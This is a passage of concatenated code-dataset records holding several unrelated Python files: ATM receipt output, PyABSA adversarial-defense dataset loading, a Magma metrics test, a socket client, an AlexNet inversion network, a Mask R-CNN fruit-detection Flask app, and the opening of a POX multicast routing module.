print(\"\\nReceipt is printed automatically when you leave.\\nPlease keep this receipt as proof of your transaction.\")\r\n print(f'\\nNo. 
Record{\" \": <7}: {random.randint(100000, 1000000)}')\r\n print(f'Date{\" \": <13}: {datetime.datetime.now()}')\r\n print(f'Current Balance{\" \": <2}: IDR {atm.checkBalance()}')\r\n print('Thank you for using ATM service')\r\n exit()\r\n # Menu tidak tersedia\r\n else:\r\n print('Sorry, that menu is not available')","sub_path":"Challenges/ATM/atm_program.py","file_name":"atm_program.py","file_ext":"py","file_size_in_byte":3341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"453403497","text":"# -*- coding: utf-8 -*-\n# file: data_utils_for_training.py\n# time: 02/11/2022 15:39\n# author: YANG, HENG (杨恒)\n# github: https://github.com/yangheng95\n# GScholar: https://scholar.google.com/citations?user=NPq5a_0AAAAJ&hl=en\n# ResearchGate: https://www.researchgate.net/profile/Heng-Yang-17/research\n# Copyright (C) 2022. All Rights Reserved.\n\nimport tqdm\n\nfrom pyabsa.framework.dataset_class.dataset_template import PyABSADataset\nfrom pyabsa.utils.file_utils.file_utils import load_dataset_from_file\nfrom pyabsa.utils.pyabsa_utils import check_and_fix_labels, fprint\n\n\nclass BERTTADDataset(PyABSADataset):\n def load_data_from_dict(self, dataset_dict, **kwargs):\n pass\n\n def load_data_from_file(self, dataset_file, **kwargs):\n lines = load_dataset_from_file(\n self.config.dataset_file[self.dataset_type], config=self.config\n )\n\n all_data = []\n\n label_set1 = set()\n label_set2 = set()\n label_set3 = set()\n\n for i in tqdm.tqdm(range(len(lines)), desc=\"preparing dataloader\"):\n line = lines[i].strip().split(\"$LABEL$\")\n text, labels = line[0], line[1]\n text = text.strip()\n label, is_adv, adv_train_label = labels.strip().split(\",\")\n label, is_adv, adv_train_label = (\n label.strip(),\n is_adv.strip(),\n adv_train_label.strip(),\n )\n\n if is_adv == \"1\" or is_adv == 1:\n adv_train_label = label\n label = \"-100\"\n else:\n label = label\n adv_train_label = \"-100\"\n # adv_train_label = '-100'\n\n 
text_indices = self.tokenizer.text_to_sequence(\"{}\".format(text))\n\n data = {\n \"text_indices\": text_indices,\n \"text_raw\": text,\n \"label\": label,\n \"adv_train_label\": adv_train_label,\n \"is_adv\": is_adv,\n }\n\n label_set1.add(label)\n label_set2.add(adv_train_label)\n label_set3.add(is_adv)\n\n all_data.append(data)\n\n check_and_fix_labels(label_set1, \"label\", all_data, self.config)\n check_and_fix_adv_train_labels(\n label_set2, \"adv_train_label\", all_data, self.config\n )\n check_and_fix_is_adv_labels(label_set3, \"is_adv\", all_data, self.config)\n self.config.class_dim = len(label_set1 - {\"-100\"})\n self.config.adv_det_dim = len(label_set3 - {\"-100\"})\n\n self.data = all_data\n\n def __init__(self, config, tokenizer, dataset_type=\"train\", **kwargs):\n super().__init__(config, tokenizer, dataset_type, **kwargs)\n\n def __getitem__(self, index):\n return self.data[index]\n\n def __len__(self):\n return len(self.data)\n\n\ndef check_and_fix_adv_train_labels(label_set: set, label_name, all_data, config):\n # update output_dim, init model behind execution of this function!\n if \"-100\" in label_set:\n adv_train_label_to_index = {\n origin_label: int(idx) - 1 if origin_label != \"-100\" else -100\n for origin_label, idx in zip(sorted(label_set), range(len(label_set)))\n }\n index_to_adv_train_label = {\n int(idx) - 1 if origin_label != \"-100\" else -100: origin_label\n for origin_label, idx in zip(sorted(label_set), range(len(label_set)))\n }\n else:\n adv_train_label_to_index = {\n origin_label: int(idx)\n for origin_label, idx in zip(sorted(label_set), range(len(label_set)))\n }\n index_to_adv_train_label = {\n int(idx): origin_label\n for origin_label, idx in zip(sorted(label_set), range(len(label_set)))\n }\n if \"index_to_adv_train_label\" not in config.args:\n config.index_to_adv_train_label = index_to_adv_train_label\n config.adv_train_label_to_index = adv_train_label_to_index\n\n if config.index_to_adv_train_label != 
index_to_adv_train_label:\n # raise KeyError('Fail to fix the labels, the number of labels are not equal among all datasets!')\n config.index_to_adv_train_label.update(index_to_adv_train_label)\n config.adv_train_label_to_index.update(adv_train_label_to_index)\n num_label = {l: 0 for l in label_set}\n num_label[\"Sum\"] = len(all_data)\n for item in all_data:\n try:\n num_label[item[label_name]] += 1\n item[label_name] = adv_train_label_to_index[item[label_name]]\n except Exception as e:\n # fprint(e)\n num_label[item.polarity] += 1\n item.polarity = adv_train_label_to_index[item.polarity]\n fprint(\"Dataset Label Details: {}\".format(num_label))\n\n\ndef check_and_fix_is_adv_labels(label_set: set, label_name, all_data, config):\n # update output_dim, init model behind execution of this function!\n if \"-100\" in label_set:\n is_adv_to_index = {\n origin_label: int(idx) - 1 if origin_label != \"-100\" else -100\n for origin_label, idx in zip(sorted(label_set), range(len(label_set)))\n }\n index_to_is_adv = {\n int(idx) - 1 if origin_label != \"-100\" else -100: origin_label\n for origin_label, idx in zip(sorted(label_set), range(len(label_set)))\n }\n else:\n is_adv_to_index = {\n origin_label: int(idx)\n for origin_label, idx in zip(sorted(label_set), range(len(label_set)))\n }\n index_to_is_adv = {\n int(idx): origin_label\n for origin_label, idx in zip(sorted(label_set), range(len(label_set)))\n }\n if \"index_to_is_adv\" not in config.args:\n config.index_to_is_adv = index_to_is_adv\n config.is_adv_to_index = is_adv_to_index\n\n if config.index_to_is_adv != index_to_is_adv:\n # raise KeyError('Fail to fix the labels, the number of labels are not equal among all datasets!')\n config.index_to_is_adv.update(index_to_is_adv)\n config.is_adv_to_index.update(is_adv_to_index)\n num_label = {l: 0 for l in label_set}\n num_label[\"Sum\"] = len(all_data)\n for item in all_data:\n try:\n num_label[item[label_name]] += 1\n item[label_name] = 
is_adv_to_index[item[label_name]]\n except Exception as e:\n # fprint(e)\n num_label[item.polarity] += 1\n item.polarity = is_adv_to_index[item.polarity]\n fprint(\"Dataset Label Details: {}\".format(num_label))\n","sub_path":"pyabsa/tasks/TextAdversarialDefense/dataset_utils/__plm__/data_utils_for_training.py","file_name":"data_utils_for_training.py","file_ext":"py","file_size_in_byte":6477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"877309","text":"\"\"\"\nCopyright 2020 The Magma Authors.\n\nThis source code is licensed under the BSD-style license found in the\nLICENSE file in the root directory of this source tree.\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\"\"\"\n\nimport unittest\n\nfrom magma.common import metrics_export\nfrom magma.monitord.metrics import SUBSCRIBER_ICMP_LATENCY_MS\n\n\nclass MetricTests(unittest.TestCase):\n \"\"\"\n Tests for the Service303 metrics interface\n \"\"\"\n def test_metrics_defined(self):\n \"\"\" Test that all metrics are defined in proto enum \"\"\"\n SUBSCRIBER_ICMP_LATENCY_MS.labels('IMSI00000001').observe(10.33)\n\n metrics_protos = list(metrics_export.get_metrics())\n for metrics_proto in metrics_protos:\n if metrics_proto.name == \"subscriber_latency_ms\":\n metric = metrics_proto.metric[0]\n self.assertEqual(metric.histogram.sample_sum, 10.33)\n self.assertEqual(metric.label[0].value, 'IMSI00000001')\n","sub_path":"modules/lte/gateway/python/magma/monitord/tests/test_metrics.py","file_name":"test_metrics.py","file_ext":"py","file_size_in_byte":1230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"79500274","text":"import json\n\nimport 
socket\n\nimport asyncio\n\nfrom utility.configuration.configuration import ConfigMetaclass, ConfigAttribute\n\n\nclass SocketConfig(metaclass=ConfigMetaclass):\n\n buffer_size = ConfigAttribute('buffer_size', int, 1500000)\n\n encoding = ConfigAttribute('encoding', str, 'utf-8')\n\n host = ConfigAttribute('host', str, 'localhost')\n\n port = ConfigAttribute('port', int, 8000)\n\n\n def __init__(self, path=None):\n\n if path:\n\n with open(path, 'r') as file:\n\n config_json = json.load(file)\n\n for name, value in config_json.items():\n\n setattr(self, name, value)\n\n\nclass SocketManager(metaclass=ConfigMetaclass):\n\n def __init__(self):\n\n self._config = SocketConfig()\n\n\n @property\n def address(self):\n\n return (self._config.host, self._config.port)\n\n\n async def send_request_message(self,TypeOfSend, **kwargs):\n\n with socket.socket() as sock:\n\n\n\n if TypeOfSend=='sendtoall':\n context = {'action':'sendall', 'message':kwargs}\n elif TypeOfSend=='sendto':\n context = {'action': 'sendto', 'message': kwargs}\n elif TypeOfSend=='auth':\n context = {'action': 'auth', 'message': kwargs}\n elif TypeOfSend =='MyLogo':\n context = {\"action\": 'MyLogo', 'message': kwargs}\n else:\n context = {'action': TypeOfSend, 'message': kwargs}\n\n response_str = json.dumps(context)\n\n response_bytes = response_str.encode(self._config.encoding)\n\n sock.connect(self.address)\n sock.send(response_bytes)\n\n\n def receive_response_message(self):\n\n with socket.socket() as sock:\n\n sock.connect(self.address)\n\n while True:\n\n response_bytes = sock.recv(self._config.buffer_size)[0:]\n\n return response_bytes.decode(self._config.encoding)\n","sub_path":"client/appcore/socketmanager.py","file_name":"socketmanager.py","file_ext":"py","file_size_in_byte":1953,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"100990445","text":"import torchvision\nimport torchvision.transforms as transforms\nimport torch\nimport 
torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport torchvision.models as models\n\n\nclass InverseNet(nn.Module):\n\n def __init__(self, l):\n super(InverseNet, self).__init__()\n self.an = models.alexnet(pretrained=True)\n feats = self.an.features\n cl = self.an.classifier\n if l < 5:\n self.conv_lin = 'conv'\n split_point = 0\n conv_cntr = 0\n for lay in feats:\n if isinstance(lay, nn.Conv2d):\n conv_cntr += 1\n split_point += 1\n\n if conv_cntr == l:\n break\n \n self.an.features = nn.Sequential(*list(feats)[:split_point+1])\n \n elif l >=6 and l <=8:\n self.conv_lin = 'lin'\n split_point = 0\n lin_cntr = 5\n for lay in feats:\n if isinstance(lay, nn.Linear):\n lin_cntr += 1\n split_point += 1\n\n if lin_cntr == l:\n break\n \n self.an.cl = nn.Sequential(*list(cl)[:split_point+1])\n\n # Freeze base network parameters\n for param in self.an.parameters():\n param.requires_grad = False\n\n self.lin_net1 = nn.Sequential(nn.Linear(1000, 4096),\n nn.LeakyReLU(0.2, inplace=True),\n nn.Linear(4096, 4096),\n nn.LeakyReLU(0.2, inplace=True),\n nn.Linear(4096, 4096),\n nn.LeakyReLU(0.2, inplace=True))\n\n self.lin_net2 = nn.Sequential(nn.ConvTranspose2d(256, 256, 5, stride=2),\n nn.LeakyReLU(0.2, inplace=True),\n nn.ConvTranspose2d(256, 128, 5, stride=2),\n nn.LeakyReLU(0.2, inplace=True),\n nn.ConvTranspose2d(128, 64, 5, stride=2),\n nn.LeakyReLU(0.2, inplace=True),\n nn.ConvTranspose2d(64, 32, 5, stride=2),\n nn.LeakyReLU(0.2, inplace=True),\n nn.ConvTranspose2d(32, 3, 8, stride=2),\n nn.LeakyReLU(0.2, inplace=True))\n \n def forward(self, x):\n x = self.an(x)\n if self.conv_lin == 'conv':\n pass\n elif self.conv_lin == 'lin':\n x = self.lin_net1(x)\n x = x.view(x.size(0), 256, 4, 4)\n x = self.lin_net2(x)\n return x\n\ndef main():\n transform = transforms.Compose([transforms.Resize((224, 224)),\n transforms.ToTensor(),\n transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))])\n \n epochs = 1\n batch_size = 4\n\n device = 
torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n\n imagenet_train = torchvision.datasets.ImageFolder('data/train', transform=transform)\n trainloader = torch.utils.data.DataLoader(imagenet_train, batch_size=batch_size, shuffle=True, num_workers=2)\n\n imagenet_test = torchvision.datasets.ImageFolder('data/test', transform=transform)\n testloader = torch.utils.data.DataLoader(imagenet_test, batch_size=batch_size, shuffle=True, num_workers=2)\n\n model = InverseNet(8)\n model = model.to(device)\n criterion = nn.MSELoss()\n optimizer = optim.Adam(filter(lambda x: x.requires_grad, model.parameters()))\n\n\n for e in range(epochs):\n total_loss = 0.0\n for i, data in enumerate(trainloader):\n img, cl = data\n img = img.to(device)\n\n optimizer.zero_grad()\n\n out = model(img)\n\n loss = criterion(out, img)\n loss.backward()\n\n total_loss += loss\n\n optimizer.step()\n\n if i % 500 == 0 and i != 0:\n print('Loss on image ' + str(batch_size * i) + ', ' + \"{0:.5f}\".format(total_loss))\n print('-' * 10)\n total_loss = 0.0\n \n\nif __name__ == '__main__':\n main()\n","sub_path":"inversion.py","file_name":"inversion.py","file_ext":"py","file_size_in_byte":4309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"114798717","text":"'''\nSome script functions are derived and modified based on the sample tutorials-ballons.py in the repo\nCredit should be given to the Repo owner Matterport, Inc\n\nhonour the original author:\nCopyright (c) 2018 Matterport, Inc.\nLicensed under the MIT License (see LICENSE for details)\ntutorial originally Written by Waleed Abdulla\n'''\n\n'''\nA simple flask application allow users to select detection or applying color splash on an uploaded images.\n\nThe app will load the pretrained model and initialize it during the flask setup progress\nIt is found that the computer must run the detection immediately loaded the model in order to save the model into the\nmemory, 
otherwise users will not be able to run detection at all, as the model is not in the memory\n\nNote:\n--Only jpg images will be allowed.\n--Depending on the computational power, the initializing time and detection time can vary [greatly].\n--It is highly recommend that users should have a decent graphic card, and have NVIDIA GPU Computing Toolkit installed\n--This repo is found to be only runnable on a specific combinations of library versions shown as below:\nGPU: Acceptable graphic cards, here we using GTX1080\nCUDA: V10.0\ntensorflow: 1.14-gpu\nkeras:2.1.3\n'''\nfrom flask import Flask, request, render_template, jsonify, redirect\nfrom datetime import timedelta\n\n\nfrom werkzeug.utils import secure_filename\n###################################\nimport os\nimport sys\nimport random\nimport numpy as np\nimport skimage.io\nimport matplotlib\nmatplotlib.use('Agg')\n\nimport mrcnn.model as modellib\nfrom mrcnn import visualize\n\nimport fruit\n###############################configure necessary path#######################################################\n# Root directory of the project\nROOT_DIR = os.path.abspath(\"../../\")\n\n# Import Mask RCNN\nsys.path.append(ROOT_DIR) # To find local version of the library\n\n# Import config\nsys.path.append(os.path.join(ROOT_DIR, \"samples/pearBanana/\")) # To find local version\n\n# Directory to save logs and trained model\nMODEL_DIR = os.path.join(ROOT_DIR, \"logs\")\n\n# Local path to trained weights file\nCOCO_MODEL_PATH = os.path.join(ROOT_DIR, \"logs/res101-2class/mask_rcnn_fruit_0065.h5\")\n\n# Directory of images to run detection on\nIMAGE_DIR = os.path.join(ROOT_DIR, \"samples/pearBanana/static/initializeImage\")\n\n\nUPLOAD_FOLDER = os.path.join(ROOT_DIR, \"samples/pearBanana/upload_images\")\nALLOWED_EXTENSIONS = set(['jpg'])\n\n########################configure flask object#################\napp = Flask(__name__, template_folder='')\n\n# avoid caching, which prevent showing the detection/splash 
result\napp.config['SEND_FILE_MAX_AGE_DEFAULT'] = timedelta(seconds=1)\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\n\nclass InferenceConfig(fruit.FruitConfig):\n # Set batch size to 1 since we'll be running inference on\n # one image at a time. Batch size = GPU_COUNT * IMAGES_PER_GPU\n GPU_COUNT = 1\n IMAGES_PER_GPU = 1\n\n POST_NMS_ROIS_INFERENCE = 2000\n\n # proved->the higher the image quality, the better the detection accuracy\n # How every, the detection speed will be slowed dramatically\n # depending on your computational power,\n # you might need to modify the 'IMAGE_MAX_DIM = 3520' to fit your graphic card memory capacity\n # as a guidance, we use GTX1080 with 8gb memory, 3520p is the maximum resolution can be dealt with.\n IMAGE_RESIZE_MODE = \"square\"\n IMAGE_MIN_DIM = 800\n IMAGE_MAX_DIM = 3520 # was 1024\n\n # Non-max suppression threshold to filter RPN proposals.\n # You can increase this during training to generate more propsals.\n RPN_NMS_THRESHOLD = 0.7\n\n # Minimum probability value to accept a detected instance\n # ROIs below this threshold are skipped\n DETECTION_MIN_CONFIDENCE = 0.6\n\n # Max number of final detections\n DETECTION_MAX_INSTANCES = 200\n\n###### create model in inference mode, must run a detection imeediately to save the model to computer memory #######\nconfig = InferenceConfig()\n# config.display()\nprint('\\n\\n -----Please be patient, the initializing process can take a while depending on your computability-----\\n\\n')\n# Create model object in inference mode.\nmodel = modellib.MaskRCNN(mode=\"inference\", model_dir=MODEL_DIR, config=config)\n\n# Load weights trained on MS-COCO\nmodel.load_weights(COCO_MODEL_PATH, by_name=True)\n\nclass_names = ['BG', 'banana', 'pear']\n\nfile_names = next(os.walk(IMAGE_DIR))[2]\nimage = skimage.io.imread(os.path.join(IMAGE_DIR, random.choice(file_names)))\nprint('\\n\\n -----Please be patient, almost done initialing-----\\n\\n')\n\n# Run detection\nresults = model.detect([image], 
verbose=1)\nr = results[0] ### the length of this will be the count of items found\nprint('\\n\\n -----Initialization Complete -----\\n\\n')\n\ndef detect_onsite(model):\n class_names = ['BG', 'banana', 'pear']\n\n user_file_names = next(os.walk(UPLOAD_FOLDER))[2]\n names_chosen = random.choice(user_file_names)\n image = skimage.io.imread(os.path.join(UPLOAD_FOLDER, names_chosen))\n # Run detection\n results = model.detect([image], verbose=1)\n\n # Visualize results\n r = results[0] ### the length of this will be the count of items found\n print('the class id of all detected objects as follows')\n print('1: banana, 2: pear')\n print(r['class_ids'], '\\nthere are', len(r['class_ids']), 'fruits detected')\n\n # Modified visualize.py line166, so need to run 'python setup.py install' again\n visualize.display_instances(image, r['rois'], r['masks'], r['class_ids'],\n class_names, r['scores'])\n print('executed detect_onsite')\n print('completed detecting: ' + names_chosen)\n banana_count = 0\n pear_count = 0\n for category in r['class_ids']:\n if category == 1:\n banana_count = banana_count + 1\n elif category == 2:\n pear_count = pear_count + 1\n count = {'banana': banana_count, 'pear': pear_count}\n return count\n########################### only accepet jpg file ####################################\ndef allowed_file(filename):\n return '.' in filename and \\\n filename.rsplit('.', 1)[1] in ALLOWED_EXTENSIONS\n####################### implement color spalsh effect ########################################\ndef color_splash(image, mask):\n \"\"\"Apply color splash effect.\n image: RGB image [height, width, 3]\n mask: instance segmentation mask [height, width, instance count]\n\n Returns result image.\n \"\"\"\n # Make a grayscale copy of the image. 
The grayscale copy still\n # has 3 RGB channels, though.\n gray = skimage.color.gray2rgb(skimage.color.rgb2gray(image)) * 255\n # Copy color pixels from the original color image where mask is set\n if mask.shape[-1] > 0:\n # We're treating all instances as one, so collapse the mask into one layer\n mask = (np.sum(mask, -1, keepdims=True) >= 1)\n splash = np.where(mask, image, gray).astype(np.uint8)\n else:\n splash = gray.astype(np.uint8)\n return splash\n\n\ndef detect_and_color_splash(model):\n # Run model detection and generate the color splash effect\n # Read image\n user_file_names = next(os.walk(UPLOAD_FOLDER))[2]\n names_chosen = random.choice(user_file_names)\n image = skimage.io.imread(os.path.join(UPLOAD_FOLDER, names_chosen))\n # Detect objects\n r = model.detect([image], verbose=1)[0]\n # Color splash\n splash = color_splash(image, r['masks'])\n # # Save output\n skimage.io.imsave('static/images/splash_result.jpg', splash)\n print('executed color splash')\n################################################################\n@app.route('/')\ndef home():\n if request.method == 'GET':\n return render_template('index.html')\n\n return render_template('index.html')\n\n\n@app.route('/UploadDetect', methods=['GET', 'POST'])\ndef upload_file_detect():\n if request.method == 'GET':\n return render_template('upload_detect.html')\n\n if request.method == 'POST':\n f = request.files['file']\n print(request.files)\n if f and allowed_file(f.filename):\n filename = secure_filename(f.filename)\n f.save(os.path.join(app.config['UPLOAD_FOLDER'], 'uploaded_image.jpg'))\n return redirect('/detect')\n else:\n print('file type is not correct')\n return render_template('upload_detect.html')\n\n@app.route('/UploadSplash', methods=['GET', 'POST'])\ndef upload_file_splash():\n if request.method == 'GET':\n return render_template('upload_splash.html')\n\n if request.method == 'POST':\n f = request.files['file']\n print(request.files)\n if f and allowed_file(f.filename):\n filename = 
secure_filename(f.filename)\n f.save(os.path.join(app.config['UPLOAD_FOLDER'], 'uploaded_image.jpg'))\n return redirect('/splash')\n else:\n print('file type is not correct')\n return render_template('upload_splash.html')\n\n\n@app.route('/detect')\ndef detect():\n count = detect_onsite(model)\n return render_template('result_detect.html', countresult = count)\n\n@app.route('/splash')\ndef splash():\n detect_and_color_splash(model)\n return render_template('result_splash.html')\n'''\nMain function to run Flask server\n'''\nif __name__ == '__main__':\n app.run()\n","sub_path":"samples/pearBanana/app-2class.py","file_name":"app-2class.py","file_ext":"py","file_size_in_byte":9230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"16035100","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n# Copyright 2014 Alexander Craig\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"\nA POX module implementation of multicast routing, supported by management of group state using the IGMP manager module.\n\nImplementation adapted from NOX-Classic CastFlow implementation provided by caioviel. Multicast routing records are stored for each \ncombination of multicast group and source address. 
For each of these records the GroupFlow module will calculate a shortest path tree \nusing Dijkstra's algorithm from the multicast source to all routers in the network (where each edge is weighted according to the number \nof hops from the multicast source). Branches of this tree which correspond to active multicast receivers are installed into the network\nthrough OpenFlow, and the spanning tree is only recalculated when the network topology changes. This should enable rapid changes of \nmulticast group, as there is no need to completely recalculate the multicast tree when new receivers join a group.\n\nThe following command line arguments are supported:\n\n* link_weight_type: Determines the method by which link weights are scaled with link utilization. Supported options are 'linear'\n (link weight scales as a linear function of utilization) or 'exponential' (link weight grows exponentially with increasing utilization).\n Default: linear\n* static_link_weight: Determines the static weight which is applied to all links regardless of utilization.\n Default: 1\n* util_link_weight: Determines the scaling factor by which utilization based link weight will be multiplied. Higher values cause the current\n traffic state to be more heavily weighted in routing (relative to the network topology). Note that setting this to 0 with either link\n weight type will produce shortest cost trees in terms of number of hops only.\n Default: 10\n* flow_replacement_mode: Determines the manner in which replacement of existing flows is triggered. 
Supported options:\n 'none': Existing flows are never replaced.\n 'periodic': Existing flows are periodically replaced.\n 'cong_threshold': In this mode, flow replacement is triggered by the FlowTracker module reporting congestion on a link traversed by the flow.\n Upon receiving a LinkUtilizationEvent, the GroupFlow module will attempt to replace the largest flows traversing the link until the link is\n brought back under its congestion threshold.\n Default: 'none'\n* flow_replacement_interval: Determines the flow replacement interval in a mode specific fashion (always specified in seconds): \n 'none': Has no effect\n 'periodic': Sets the periodic interval at which flows are replaced.\n 'cong_threshold': Sets the minimum interval that must elapse after flow placement, before the flow can be replaced.\n Default: 10\n\nDepends on openflow.igmp_manager, misc.groupflow_event_tracer (optional)\n\nCreated on July 16, 2013\n\nAuthor: Alexander Craig - alexcraig1@gmail.com\n\"\"\"\n\nfrom collections import defaultdict\nfrom sets import Set\nfrom heapq import heappop, heappush\nimport time\n\n# POX dependencies\nfrom pox.openflow.discovery import Discovery\nfrom pox.core import core\nfrom pox.lib.revent import *\nfrom pox.misc.groupflow_event_tracer import *\nfrom pox.openflow.flow_tracker import *\nfrom pox.lib.util import dpid_to_str\nimport pox.lib.packet as pkt\nfrom pox.lib.packet.igmp import * # Required for various IGMP variable constants\nfrom pox.lib.packet.ethernet import *\nimport pox.openflow.libopenflow_01 as of\nfrom pox.lib.addresses import IPAddr, EthAddr\nfrom pox.lib.recoco import Timer\nimport sys\n\nlog = core.getLogger()\n\n# Constants used to determine which link weighting scheme is used\nLINK_WEIGHT_LINEAR = 1\nLINK_WEIGHT_EXPONENTIAL = 2\n\nSTATIC_LINK_WEIGHT = 1 # Scaling factor for link weight which is statically assigned (implements shortest hop routing if no dynamic link weight is set)\nUTILIZATION_LINK_WEIGHT = 10 # Scaling factor for link 
weight which is determined by current link utilization\n\n# Default flow replacement interval\nFLOW_REPLACEMENT_INTERVAL_SECONDS = 10\n\n# Constants to determine flow replacement mode\nNO_FLOW_REPLACEMENT = 0\nPERIODIC_FLOW_REPLACEMENT = 1\nCONG_THRESHOLD_FLOW_REPLACEMENT = 2\n\n# Developer constants\n# The below constants enable/configure experimental features which have not yet been integrated into the module API\nENABLE_OUT_OF_ORDER_PACKET_DELIVERY = False\n\nclass MulticastPath(object):\n \"\"\"Manages multicast route calculation and installation for a single pair of multicast group and multicast sender.\"\"\"\n\n def __init__(self, src_ip, src_router_dpid, ingress_port, dst_mcast_address, groupflow_manager, groupflow_trace_event = None):\n self.src_ip = src_ip\n self.ingress_port = ingress_port\n self.src_router_dpid = src_router_dpid\n self.dst_mcast_address = dst_mcast_address\n self.path_tree_map = defaultdict(lambda : None) # self.path_tree_map[router_dpid] = Complete path from receiver router_dpid to src\n self.weighted_topo_graph = []\n self.node_list = [] # List of all managed router dpids\n self.installed_node_list = [] # List of all router dpids with rules currently installed\n self.receivers = [] # Tuples of (router_dpid, port)\n self.groupflow_manager = groupflow_manager\n self.flow_cookie = self.groupflow_manager.get_new_mcast_group_cookie()\n self.calc_path_tree_dijkstras(groupflow_trace_event)\n self._last_flow_replacement_time = None\n self._flow_replacement_timer = None\n\n def calc_path_tree_dijkstras(self, groupflow_trace_event = None):\n \"\"\"Calculates a shortest path tree from the group sender to all network switches, and caches the resulting tree.\n\n Note that this function does not install any flow modifications.\"\"\"\n if not groupflow_trace_event is None:\n groupflow_trace_event.set_tree_calc_start_time(self.dst_mcast_address, self.src_ip)\n self._last_flow_replacement_time = time.time()\n \n self._calc_link_weights()\n \n nodes = 
set(self.node_list)\n edges = self.weighted_topo_graph\n graph = defaultdict(list)\n for src,dst,cost in edges:\n graph[src].append((cost, dst))\n \n path_tree_map = defaultdict(lambda : None)\n queue, seen = [(0,self.src_router_dpid,())], set()\n while queue:\n (cost,node1,path) = heappop(queue)\n if node1 not in seen:\n seen.add(node1)\n path = (node1, path)\n path_tree_map[node1] = path\n \n for next_cost, node2 in graph.get(node1, ()):\n if node2 not in seen:\n new_path_cost = cost + next_cost\n heappush(queue, (new_path_cost, node2, path))\n \n self.path_tree_map = path_tree_map\n \n log.debug('Calculated shortest path tree for source at router_dpid: ' + dpid_to_str(self.src_router_dpid))\n for node in self.path_tree_map:\n log.debug('Path to Node ' + dpid_to_str(node) + ': ' + str(self.path_tree_map[node]))\n \n if not groupflow_trace_event is None:\n groupflow_trace_event.set_tree_calc_end_time()\n \n def _calc_link_weights(self):\n \"\"\"Calculates link weights for all links in the network to be used by calc_path_tree_dijkstras().\n\n The cost assigned to each link is based on the link's current utilization (as determined by the FlowTracker\n module), and the exact manner in which utilization is converted to a link wieght is determined by\n groupflow_manager.link_weight_type. Valid options are LINK_WEIGHT_LINEAR and LINK_WEIGHT_EXPONENTIAL. Both options\n include a static weight which is always assigned to all links (determined by groupflow_manager.static_link_weight),\n and a dynamic weight which is based on the current utilization (determined by\n groupflow_manager.utilization_link_weight). 
Setting groupflow_manager.utilization_link_weight to 0 will always\n results in shortest hop routing.\n \"\"\"\n curr_topo_graph = self.groupflow_manager.topology_graph\n self.node_list = list(self.groupflow_manager.node_set)\n \n weighted_topo_graph = []\n current_util = core.openflow_flow_tracker.get_max_flow_utilization(self.flow_cookie) / core.openflow_flow_tracker.link_max_bw\n log.info('Current utilization of flow ' + str(self.flow_cookie) + ': ' + str(current_util * core.openflow_flow_tracker.link_max_bw) + ' Mbps')\n \n for edge in curr_topo_graph:\n output_port = self.groupflow_manager.adjacency[edge[0]][edge[1]]\n raw_link_util = core.openflow_flow_tracker.get_link_utilization_normalized(edge[0], output_port);\n link_util_mcast_flow = core.openflow_flow_tracker.get_flow_utilization_normalized(edge[0], output_port, self.flow_cookie)\n \n link_util = max(0, (raw_link_util * (1 - link_util_mcast_flow)))\n \n # link_util = raw_link_util # Uncommenting this line will cause flows to reroute around their own traffic, good for testing\n \n # Current utilization here is doubled as a simple attempt to handle variability in flow rates\n if link_util + (current_util * 2) > 1:\n link_util = 1\n \n link_weight = 1\n \n if self.groupflow_manager.util_link_weight == 0:\n link_weight = self.groupflow_manager.static_link_weight\n else:\n if self.groupflow_manager.link_weight_type == LINK_WEIGHT_LINEAR:\n if link_util >= 1:\n link_weight = sys.float_info.max / core.openflow_flow_tracker.get_num_tracked_links()\n else:\n link_weight = min(self.groupflow_manager.static_link_weight + (self.groupflow_manager.util_link_weight * link_util),\n sys.float_info.max / core.openflow_flow_tracker.get_num_tracked_links())\n elif self.groupflow_manager.link_weight_type == LINK_WEIGHT_EXPONENTIAL:\n if link_util >= 1:\n link_weight = sys.float_info.max / core.openflow_flow_tracker.get_num_tracked_links()\n else:\n link_weight = min(self.groupflow_manager.static_link_weight + 
(self.groupflow_manager.util_link_weight * ((1 / (1 - link_util)) - 1)),\n sys.float_info.max / core.openflow_flow_tracker.get_num_tracked_links())\n \n log.debug('Router DPID: ' + dpid_to_str(edge[0]) + ' Port: ' + str(output_port) + \n ' TotalUtil: ' + str(raw_link_util) + ' FlowUtil: ' + str(link_util_mcast_flow) + ' OtherFlowUtil: ' + str(link_util) \n + ' Weight: ' + str(link_weight))\n\n weighted_topo_graph.append([edge[0], edge[1], link_weight])\n self.weighted_topo_graph = weighted_topo_graph\n \n log.debug('Calculated link weights for source at router_dpid: ' + dpid_to_str(self.src_router_dpid))\n for edge in self.weighted_topo_graph:\n log.debug(dpid_to_str(edge[0]) + ' -> ' + dpid_to_str(edge[1]) + ' W: ' + str(edge[2]))\n \n def install_openflow_rules(self, groupflow_trace_event = None):\n \"\"\"Selects routes for active receivers from the cached shortest path tree, and installs/removes OpenFlow rules accordingly.\"\"\"\n reception_state = self.groupflow_manager.get_reception_state(self.dst_mcast_address, self.src_ip)\n log.debug('Reception state for ' 